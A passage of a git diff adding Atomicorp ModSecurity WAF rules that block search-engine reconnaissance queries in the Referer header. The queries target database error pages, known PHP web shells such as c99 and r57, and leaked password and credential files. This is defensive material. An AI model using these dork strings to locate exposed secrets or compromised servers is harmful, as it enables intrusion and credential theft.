+SecRule REQUEST_HEADERS:Referer   "warning: bad arguments to \(join\|implode\) \(\) in on line -help -forum" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371176,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: failed to open stream: http request failed on line " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371177,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: mysql_connect\(\): access denied for user: '\*@\* on line -help -forum" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371178,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: division by zero in on line -forum" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371179,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: safe mode restriction in effect\. the script whose uid is is not allowed to access owned by uid 0 in on line" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371181,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: supplied argument is not a valid file-handle resource in " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371182,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: mysql_query\(\) invalid query" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371189,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "php application warnings failing include_path" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371198,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning error on line php sablotron" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371207,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: cannot modify header information - headers already sent" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371213,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: pg_connect\(\): unable to connect to postgresql server: fatal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371214,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "php-addressbook this is the addressbook for " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371307,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "warning: cannot execute a blank command in" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371562,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
+SecMarker END_RECON_CHECKS_WARNING
+
+SecRule REQUEST_HEADERS:Referer "@pm incorrect unexpected illegal error valid unclosed quotation problem allowed phpinfo sql"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,id:333935,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313796,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_ERROR"
+
+SecRule REQUEST_HEADERS:Referer   "error found handling the request cocoon filetype:xml" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371204,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:asp  \+ \[odbc sql" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371180,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:log php parse error \| php warning \| php error" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371193,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:asp custom error message category source" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371209,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "a syntax error has occurred filetype:ihtml" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371217,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "\[ phpinfo \]  \[ php\.ini \]  \[ cpu \]  \[ mem \]  \[ users \]  \[ tmp \]  \[ delete \]" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:371982,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "there seems to have been a problem with the  please try again by clicking the refresh button in your web browser\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371183,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "the script whose uid is  is not allowed to access" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371191,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "an unexpected token end-of-statement was found" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371215,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "supplied argument is not a valid (?:postgresql|mysql) result" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371220,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "unclosed quotation mark before the character string" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371224,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "an illegal character has been found in the statement -previous message" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371218,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\[sql server driver\]\[sql server\]line 1: incorrect syntax near -forum -thread -showthread" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371186,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "incorrect syntax near" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371223,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "parse error: parse error" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371185,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "databasetype\. code : 80004005\. error description :" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371192,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "internal server error server at" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371197,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "invision power board database error" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371203,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "fatal error: call to undefined function -reply -the -next" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371208,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "detected an internal error \[ibm\]\[cli driver\]\[db2/6000\]" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371216,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "syntax error in query expression  -the" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371219,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "postgresql query failed:  error:  parser: parse error" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371221,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "you have an error in your sql syntax near" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371229,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "mysql error with query" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371230,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecMarker END_RECON_CHECKS_ERROR
+
+SecRule REQUEST_HEADERS:Referer "ora-"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:333936,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313797,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_ORA"
+SecRule REQUEST_HEADERS:Referer   "ora-00933: sql command not properly ended" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371225,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ora-00921: unexpected end of sql command" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371226,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ora-00936: missing expression" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371227,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ora-00921: unexpected end of sql command" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371238,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecMarker END_RECON_CHECKS_ORA
+
+#Installed malware
+SecRule REQUEST_HEADERS:Referer "@pm cgi-telnet unit-x c99 safe_mode r57 locus c100 danyliw haxplorer phpshell"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,id:333937,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313798,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_MALWARE"
+
+SecRule REQUEST_HEADERS:Referer   "phpkonsole phpshell  filetype:php -echo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371026,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Google Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "acid by roman danyliw filetype:php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371964,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer  "php haxplorer .*server files browser" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350012,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer   "cgi-telnet unit-x team connected to \*\.com or cgi-telnet unit-x team connected to" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371977,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "www\.\*\.com - c99shell or www\.\*\.net - c99shell or www\.\*\.org - c99shell" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371978,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "safe_mode: \*  php version: \*  curl: \*  mysql: \*  mssql: \*  postgresql: \*  oracle: \*" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371979,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "r57shell" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371980,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:r57shell \+uname -bbpress" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371916,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer  "(?:c(?:99|100)|locus|r57shell|r57)\.(?:txt|php)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350030,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Web Shell Search Engine Recon attempt'"
+SecMarker END_RECON_CHECKS_MALWARE
+
+SecMarker END_RECON_CHECKS
diff --git a/nginx-waf/61_asl_recons_dlp.conf b/nginx-waf/61_asl_recons_dlp.conf
new file mode 100644
index 0000000..a68291c
--- /dev/null
+++ b/nginx-waf/61_asl_recons_dlp.conf
@@ -0,0 +1,292 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Search Engine Recon/Search Engine Hacks Security Rules for modsec 2.x
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2011 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+# Note: For modsecurity 2.5 and above only
+# Use 404 for these rules to trick attackers and search engines
+# TODO - dont check internal referrers
+SecDefaultAction "log,deny,auditlog,phase:2,status:404"
+
+SecRule REQUEST_HEADERS:Referer "@pm ext:inc ext:ini ext:cfg ext:cgi ext:wml ext:dca ext:ccm ext:cdx ext:dbf ext:jbf ext:ics ext:reg ext:dat ext:vmx ext:vmdk ext:pqi ext:gho ext:txt ext:log ext:conf ext:nsf ext:ldif ext:php ext: ext:htm ext:dhtml filetype: username public sensitive vulnerability receipt admin confidential restricted intranet security passwd password passlist assessment secret index"         "id:333890,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313498,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_DLP_ALL"
+
+#possible info leak probes
+SecRule REQUEST_HEADERS:Referer "@pm public sensitive vulnerability receipt admin confidential restricted intranet security assessment safeguard unclassified"         "id:333891,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:315409,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_DLP"
+
+SecRule REQUEST_HEADERS:Referer   "not for public release" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371253,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "(?:security (?:related|restricted)|safeguards?|sensitive but unclassified|unclassified controlled nuclear) information" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373254,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "host vulnerability summary report " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371436,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "performed by beyond security's automated scanning" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371931,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "network vulnerability assessment report" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371437,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "thank you for your order \+receipt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371438,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "site:edu grades admin" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "not for distribution confidential" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371439,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "you have requested access to a restricted area of our website\. please authenticate yourself to continue\." "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "shadow security scanner performed a vulnerability assessment" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371925,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "the following report contains confidential information vulnerability" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371926,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "network host assessment report internet scanner" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371972,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "welcome to intranet" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372024,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+
+
+SecMarker END_RECON_CHECKS_DLP
+
+SecRule REQUEST_HEADERS:Referer "@pm passwd password protected username ap-secrets passlist"         "id:333892,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:302904,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_PASSWORD"
+
+SecRule REQUEST_HEADERS:Referer   "inurl:(?:p|ch)ap-secrets -cvs " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373092,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:log username putty" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371004,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:sql password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371122,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:reg reg hkey_current_user username" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "login: \* password: \* filetype:xls" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371037,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:sql insert into.*pass" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371040,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "your password is filetype:log" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "\[wfclient\] password= filetype:ica" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   " filetype:sql \(passwd values \*\*\*\* \| password values \*\*\*\* \| pass values \*\*\*\* \)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371070,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: '"
+SecRule REQUEST_HEADERS:Referer   "filetype:sql \(values \* md5 \* \| values \* password \* \| values \* encrypt \*\)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371071,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:netrc password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371128,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:dat password\.dat" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cfm cfapplication name password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:htpasswd htpasswd" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:xls username password email" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:mdb standard jet \(password \| username \| user \| pass\)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371571,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*(?:passlist|passwords?|passwds?)\.txt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Password list Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:-cfg in(?:text|body):enable password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371036,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ventrilo_srv\.ini adminpassword" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371047,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
